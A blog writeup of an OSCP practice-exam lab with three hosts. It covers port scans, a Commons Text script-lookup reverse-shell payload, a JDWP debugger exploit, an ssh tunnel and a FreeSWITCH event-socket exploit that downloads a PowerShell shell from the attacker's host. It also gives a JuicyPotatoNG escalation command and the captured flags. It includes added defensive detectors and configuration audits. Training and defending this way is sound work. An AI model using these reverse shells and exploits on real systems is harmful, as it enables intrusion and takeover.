OSCP-OSCP B

192.168.226.150

  • NMAP

    PORT     STATE SERVICE     REASON
    22/tcp   open  ssh         syn-ack
    8080/tcp open  http-proxy  syn-ack
  • dirsearch

    [15:19:00] 400 -  800B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
    [15:19:03] 400 -  800B  - /a%5c.aspx
    [15:19:50] 200 -  194B  - /CHANGELOG
    [15:20:09] 500 -  105B  - /error
    [15:20:10] 500 -  105B  - /error/
    [15:20:12] 200 -  946B  - /favicon.ico
    [15:21:09] 200 -   25B  - /search
  • The CHANGELOG shows that Commons Text is in use

  • The search page can trigger the payload

    # Runtime.exec payload

    ${script:javascript:java.lang.Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/192.168.45.172/443 0>&1")}

    %24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%22%2Fbin%2Fbash%20-c%20%24%40%7Cbash%200%20echo%20bash%20-i%20%3E%26%2Fdev%2Ftcp%2F192.168.45.172%2F443%200%3E%261%22%29%7D
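The `${script:javascript:...}` expression above is Commons Text `StringSubstitutor` lookup syntax, and the URL-encoded second form is what actually travels in the `/search` request. From the defender's side, the thing to look for in web logs is that `${<lookup>:` shape after percent-decoding, including double-encoded variants that a single decode pass would miss. The Python scanner below is an added example, not code from the writeup; the combined-format log lines, the `q` query parameter and the harmless `1+1` script body are constructed here, and only the `script` lookup seen on this page is on its flag list.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Interpolator prefixes to flag. "script" is the lookup the writeup's payload
# uses; add any other lookup your Commons Text version enables.
DANGEROUS_LOOKUPS = {"script"}

# Commons Text StringSubstitutor syntax: ${<lookup>:<argument>}
LOOKUP_RE = re.compile(r"\$\{\s*([A-Za-z]+)\s*:")

# Request target inside a combined-format access log line
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding so that %2524 -> %24 -> $ is still caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_lookups(raw: str) -> List[str]:
    """Return the interpolator names used in ${name:...} expressions after decoding."""
    return [m.group(1).lower() for m in LOOKUP_RE.finditer(fully_decode(raw))]


def is_suspicious(raw: str) -> bool:
    return any(name in DANGEROUS_LOOKUPS for name in find_lookups(raw))


def scan_access_log(lines: List[str]) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, request target, lookups) for each request carrying a dangerous lookup."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = match.group(1)
        if is_suspicious(target):
            findings.append((number, target, find_lookups(target)))
    return findings


# Constructed access-log lines (not from the writeup): a normal search, the
# encoded payload shape from the writeup with a harmless script body, a
# double-encoded variant, and an ordinary ${price} placeholder that must not fire.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Nov/2023:15:21:09 +0000] "GET /search?q=laptop HTTP/1.1" 200 25',
    '10.0.0.5 - - [01/Nov/2023:15:21:12 +0000] "GET /search?q=%24%7Bscript%3Ajavascript%3A1%2B1%7D HTTP/1.1" 200 25',
    '10.0.0.5 - - [01/Nov/2023:15:21:15 +0000] "GET /search?q=%2524%257Bscript%253Ajavascript%253A1%252B1%257D HTTP/1.1" 200 25',
    '10.0.0.5 - - [01/Nov/2023:15:21:20 +0000] "GET /search?q=%24%7Bprice%7D HTTP/1.1" 200 25',
]

if __name__ == "__main__":
    for number, target, lookups in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {target} uses lookup(s) {lookups}")
```

The scanner reports the second and third sample lines and stays quiet on the plain `${price}` placeholder, because only expressions with a lookup prefix reach an interpolator. Finding attempts in logs is the detection half; the fix is to stop passing user input through `StringSubstitutor` with interpolator lookups enabled, or to move to Commons Text 1.10.0 or later, where the script lookup is disabled by default.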
  • netstat -antp shows port 8000 listening on localhost

    tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN  
  • ps aux to confirm what is behind port 8000

    root         852  0.0  1.7 2528964 35144 ?       Ssl  07:13   0:00 java -Xdebug -Xrunjdwp:transport=dt_socket,address=8000,server=y /opt/stats/App.java
  • App.java

    import java.io.IOException;
    import java.io.InputStream;
    import java.io.OutputStream;
    import java.net.ServerSocket;
    import java.net.Socket;

    class StatsApp {
        public static void main(String[] args) {
            System.out.println("System Stats\n");
            Runtime rt = Runtime.getRuntime();
            String output = new String();

            try {
                ServerSocket echod = new ServerSocket(5000);
                while (true) {
                    output = "";
                    output += "Available Processors: " + rt.availableProcessors() + "\r\n";
                    output += "Free Memory: " + rt.freeMemory() + "\r\n";
                    output += "Total Memory: " + rt.totalMemory() + "\r\n";

                    Socket socket = echod.accept();
                    InputStream in = socket.getInputStream();
                    OutputStream out = socket.getOutputStream();
                    out.write((output + "\r\n").getBytes());
                    System.out.println(output);
                }
            } catch (IOException e) {
                System.err.println(e.toString());
                System.exit(1);
            }
        }
    }
  • ssh tunnel

    ssh -nNTR 1234:127.0.0.1:8000 giwawa@192.168.45.172
  • JDWP RCE

    python2 jdwp-shellifier.py -t 127.0.0.1 -p 1234 --cmd "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE3Mi80NDMgMD4mMQ==}|{base64,-d}|{bash,-i}"

    # trigger it via port 5000
    nc -nv 192.168.226.150 5000

    # listener
    nc -lvnp 443
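The `ps aux` line earlier and the JDWP step just above are two views of the same finding: a JVM started with `-Xrunjdwp:...,server=y` accepts any debugger that can reach its port, and a debugger can run code as the JVM's user (root here). Binding to loopback, as the netstat output shows, does not close that off, because a local account or a forwarded port (the `ssh -R` tunnel above) reaches it just the same. The Python audit below is an added example, not the writeup's tooling; it parses `ps aux` output for JDWP agent options and reports who is exposed to what. The first sample line is the writeup's own `ps` line, the second is constructed.

```python
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Debug-agent switches: legacy -Xrunjdwp:<opts> and current -agentlib:jdwp=<opts>
JDWP_SWITCH = re.compile(r"^-(?:Xrunjdwp:|agentlib:jdwp=)(.+)$")

# Hosts that mean "every interface" / "loopback only" in a JDWP address
ANY_HOSTS = {"*", "0.0.0.0", "::"}
LOOPBACK_HOSTS = {"127.0.0.1", "localhost", "::1"}


@dataclass
class JdwpListener:
    pid: int
    user: str
    host: Optional[str]   # None when the address carries no host part
    port: Optional[str]
    suspend: bool


def parse_options(opts: str) -> dict:
    """Split 'k=v,k=v' agent options into a dict."""
    parsed = {}
    for item in opts.split(","):
        key, _, value = item.partition("=")
        parsed[key.strip()] = value.strip()
    return parsed


def jdwp_from_ps_line(line: str) -> Optional[JdwpListener]:
    """Return a finding when a `ps aux` line shows a JVM with a listening JDWP agent."""
    fields = line.split(None, 10)  # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
    if len(fields) < 11:
        return None
    user, pid, command = fields[0], int(fields[1]), fields[10]
    for arg in shlex.split(command):
        match = JDWP_SWITCH.match(arg)
        if not match:
            continue
        opts = parse_options(match.group(1))
        if opts.get("server", "n") != "y":
            return None  # client mode: the JVM dials out, nothing listens
        host, _, port = opts.get("address", "").rpartition(":")
        return JdwpListener(
            pid=pid, user=user, host=host or None, port=port or None,
            suspend=opts.get("suspend", "y") == "y",  # the JDWP agent's default is suspend=y
        )
    return None


def exposure(listener: JdwpListener) -> str:
    """Classify which clients can reach the listener from the host part of its address."""
    if listener.host is None:
        # Bare port: JDK 9 and later bind loopback only, older JDKs bind every interface
        return "loopback on JDK 9+, all interfaces on older JDKs"
    if listener.host in ANY_HOSTS:
        return "all interfaces"
    if listener.host in LOOPBACK_HOSTS:
        return "loopback only"
    return f"interface {listener.host}"


def audit(ps_output: List[str]) -> List[str]:
    """One report line per JVM exposing JDWP; loopback still counts as exposed."""
    report = []
    for line in ps_output:
        found = jdwp_from_ps_line(line)
        if found:
            report.append(
                f"pid {found.pid} ({found.user}) listens for JDWP on port {found.port} "
                f"[{exposure(found)}]; an attached debugger runs code as {found.user}"
            )
    return report


# Sample ps aux lines: the first is the writeup's, the second is constructed
SAMPLE_PS = [
    "root         852  0.0  1.7 2528964 35144 ?       Ssl  07:13   0:00 java -Xdebug -Xrunjdwp:transport=dt_socket,address=8000,server=y /opt/stats/App.java",
    "tomcat      1201  0.3  6.2 3412000 128000 ?      Ssl  07:14   0:05 java -Xmx1g -jar /opt/app/app.jar",
]

if __name__ == "__main__":
    for entry in audit(SAMPLE_PS):
        print(entry)
```

On the writeup's line the address has no host part. Because that JVM launches a `.java` source file directly, which only JDK 11 and later can do, the bare `address=8000` binds to loopback, which matches the `127.0.0.1:8000` netstat entry. The remediation is simply not to ship the debug agent on a production service, least of all one running as root.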

FLAG

# /root/proof.txt
990647b01047f4f2c22df8ba4778b147

# /home/dev/local.txt
768b7ed8656a4f4803d5bc5ccbe678f9

192.168.226.149

  • NMAP

    PORT   STATE SERVICE REASON
    21/tcp open  ftp     syn-ack
    22/tcp open  ssh     syn-ack
    80/tcp open  http    syn-ack

192.168.226.151

  • NMAP

    PORT     STATE SERVICE          REASON  VERSION
    80/tcp open http syn-ack Microsoft IIS httpd 10.0
    |_http-title: IIS Windows
    | http-methods:
    | Supported Methods: OPTIONS TRACE GET HEAD POST
    |_ Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/10.0
    3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
    | rdp-ntlm-info:
    | Target_Name: OSCP
    | NetBIOS_Domain_Name: OSCP
    | NetBIOS_Computer_Name: OSCP
    | DNS_Domain_Name: OSCP
    | DNS_Computer_Name: OSCP
    | Product_Version: 10.0.19041
    |_ System_Time: 2023-11-01T09:29:13+00:00
    | ssl-cert: Subject: commonName=OSCP
    | Issuer: commonName=OSCP
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2023-10-31T07:15:26
    | Not valid after: 2024-05-01T07:15:26
    | MD5: d4f8ef9790d05fe5b6f60e2632144d83
    | SHA-1: 82b0d6a831f86f6392690f49898d65a65fb2e50e
    |_ssl-date: 2023-11-01T09:29:18+00:00; 0s from scanner time.
    5060/tcp open sip-proxy syn-ack FreeSWITCH mod_sofia 1.10.1~64bit
    |_sip-methods: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY, PUBLISH, SUBSCRIBE
    5080/tcp open sip-proxy syn-ack FreeSWITCH mod_sofia 1.10.1~64bit
    7443/tcp open ssl/websocket syn-ack (WebSocket version: 13)
    |_ssl-date: TLS randomness does not represent time
    | ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
    | Issuer: commonName=FreeSWITCH/countryName=US
    | Public Key type: rsa
    | Public Key bits: 4096
    | Signature Algorithm: sha1WithRSAEncryption
    | Not valid before: 2022-10-28T14:47:12
    | Not valid after: 1986-09-04T08:18:56
    | MD5: e3d31a79bff35962afd78cebff133ab1
    | SHA-1: cab027d5cfbf62cf882c0ca77a6ee9f9b9082ae8
    8021/tcp open freeswitch-event syn-ack FreeSWITCH mod_event_socket
    8081/tcp open websocket syn-ack (WebSocket version: 13)
    | fingerprint-strings:
    | GenericLines, GetRequest, HTTPOptions:
    | HTTP/1.1 400 Bad Request
    |_ Sec-WebSocket-Version: 13
    |_mcafee-epo-agent: ePO Agent not found
    8082/tcp open ssl/websocket syn-ack (WebSocket version: 13)
    | fingerprint-strings:
    | GenericLines, GetRequest, HTTPOptions:
    | HTTP/1.1 400 Bad Request
    |_ Sec-WebSocket-Version: 13
    | ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
    | Issuer: commonName=FreeSWITCH/countryName=US
    | Public Key type: rsa
    | Public Key bits: 4096
    | Signature Algorithm: sha1WithRSAEncryption
    | Not valid before: 2022-10-28T14:47:12
    | Not valid after: 1986-09-04T08:18:56
    | MD5: e3d31a79bff35962afd78cebff133ab1
    | SHA-1: cab027d5cfbf62cf882c0ca77a6ee9f9b9082ae8
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
    Host script results:
    |_clock-skew: mean: 0s, deviation: 0s, median: -1s
  • Port 8021 has an RCE

    # FreeSWITCH 1.10.1 - Command Execution

    python3 exp.py 192.168.226.151 "powershell -nop -ep bypass -C IEX(new-object system.net.webclient).downloadstring('http://192.168.45.172/shell.ps1')"
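Port 8021 is FreeSWITCH's event socket (`mod_event_socket`), which the nmap scan above fingerprinted. The published command-execution path for this version works because the socket is reachable from the network and accepts the password FreeSWITCH ships with; once authenticated, the event socket's `api` interface can run system commands. The Python audit below is an added example (not the writeup's `exp.py`) that checks an `event_socket.conf.xml` for the three settings that decide that exposure. Both configuration fragments are constructed for the example, and the hardened password is a placeholder.

```python
import xml.etree.ElementTree as ET
from typing import List

DEFAULT_ESL_PASSWORD = "ClueCon"  # the event-socket password FreeSWITCH ships with
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def esl_settings(xml_text: str) -> dict:
    """Collect <param name=... value=.../> pairs from event_socket.conf.xml."""
    root = ET.fromstring(xml_text)
    return {p.get("name"): p.get("value") for p in root.iter("param")}


def audit_event_socket(xml_text: str) -> List[str]:
    """Return finding codes for an event_socket.conf.xml; an empty list means hardened."""
    settings = esl_settings(xml_text)
    findings = []
    if settings.get("password", DEFAULT_ESL_PASSWORD) == DEFAULT_ESL_PASSWORD:
        findings.append("default-password")         # anyone who reaches 8021 can authenticate
    if settings.get("listen-ip", "0.0.0.0") not in LOOPBACK:
        findings.append("listens-beyond-loopback")  # reachable from the network, as nmap showed
    if not settings.get("apply-inbound-acl"):
        findings.append("no-inbound-acl")           # no ACL restricts which sources may connect
    return findings


# Constructed weak configuration: wildcard bind, shipped password, ACL left commented out
WEAK_CONFIG = """<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="nat-map" value="false"/>
    <param name="listen-ip" value="0.0.0.0"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="ClueCon"/>
    <!--<param name="apply-inbound-acl" value="loopback.auto"/>-->
  </settings>
</configuration>"""

# Constructed hardened configuration: loopback bind, unique password, built-in loopback ACL
HARDENED_CONFIG = """<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="nat-map" value="false"/>
    <param name="listen-ip" value="127.0.0.1"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="REPLACE-WITH-LONG-RANDOM-SECRET"/>
    <param name="apply-inbound-acl" value="loopback.auto"/>
  </settings>
</configuration>"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_event_socket(cfg) or "ok")
```

A missing `listen-ip` is treated as a wildcard bind, so the audit errs toward reporting. The fact that nmap saw 8021 open from the attacker's network segment already tells a defender that the first two findings applied to this host; the host-based firewall is the second layer that should have stopped it.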
  • systeminfo

    Host Name:                 OSCP
    OS Name: Microsoft Windows 10 Pro
    OS Version: 10.0.19043 N/A Build 19043
    OS Manufacturer: Microsoft Corporation
    OS Configuration: Standalone Workstation
    OS Build Type: Multiprocessor Free
    Registered Owner: chris
    Registered Organization:
    Product ID: 00331-10000-00001-AA613
    Original Install Date: 10/31/2022, 12:36:15 PM
    System Boot Time: 7/11/2023, 10:58:12 AM
    System Manufacturer: VMware, Inc.
    System Model: VMware7,1
    System Type: x64-based PC
    Processor(s): 2 Processor(s) Installed.
    [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2650 Mhz
    [02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2650 Mhz
    BIOS Version: VMware, Inc. VMW71.00V.21100432.B64.2301110304, 1/11/2023
    Windows Directory: C:\Windows
    System Directory: C:\Windows\system32
    Boot Device: \Device\HarddiskVolume1
    System Locale: en-us;English (United States)
    Input Locale: en-us;English (United States)
    Time Zone: (UTC-08:00) Pacific Time (US & Canada)
    Total Physical Memory: 6,143 MB
    Available Physical Memory: 4,550 MB
    Virtual Memory: Max Size: 7,807 MB
    Virtual Memory: Available: 6,207 MB
    Virtual Memory: In Use: 1,600 MB
    Page File Location(s): C:\pagefile.sys
    Domain: WORKGROUP
    Logon Server: N/A
    Hotfix(s): 11 Hotfix(s) Installed.
    [01]: KB5020613
    [02]: KB4562830
    [03]: KB4570334
    [04]: KB4577586
    [05]: KB4580325
    [06]: KB4586864
    [07]: KB5000736
    [08]: KB5012170
    [09]: KB5018410
    [10]: KB5014032
    [11]: KB5016705
    Network Card(s): 1 NIC(s) Installed.
    [01]: vmxnet3 Ethernet Adapter
    Connection Name: Ethernet0
    DHCP Enabled: No
    IP address(es)
    [01]: 192.168.226.151
    Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
  • JuicyPotato

    JuicyPotatoNG.exe -l 1337 -t * -p shell.exe

FLAG

# c:\Documents and Settings\Administrator\Desktop\proof.txt
c1e10f71a45f0d901829cfb03da816ec

# c:\Documents and Settings\chris\Desktop\local.txt
aef2f901618199c8c0e1efa1d4d656f1

https://luoming1995125.github.io/2023/11/01/OSCP-OSCPB/
Author: Peter Luo
Published on November 1, 2023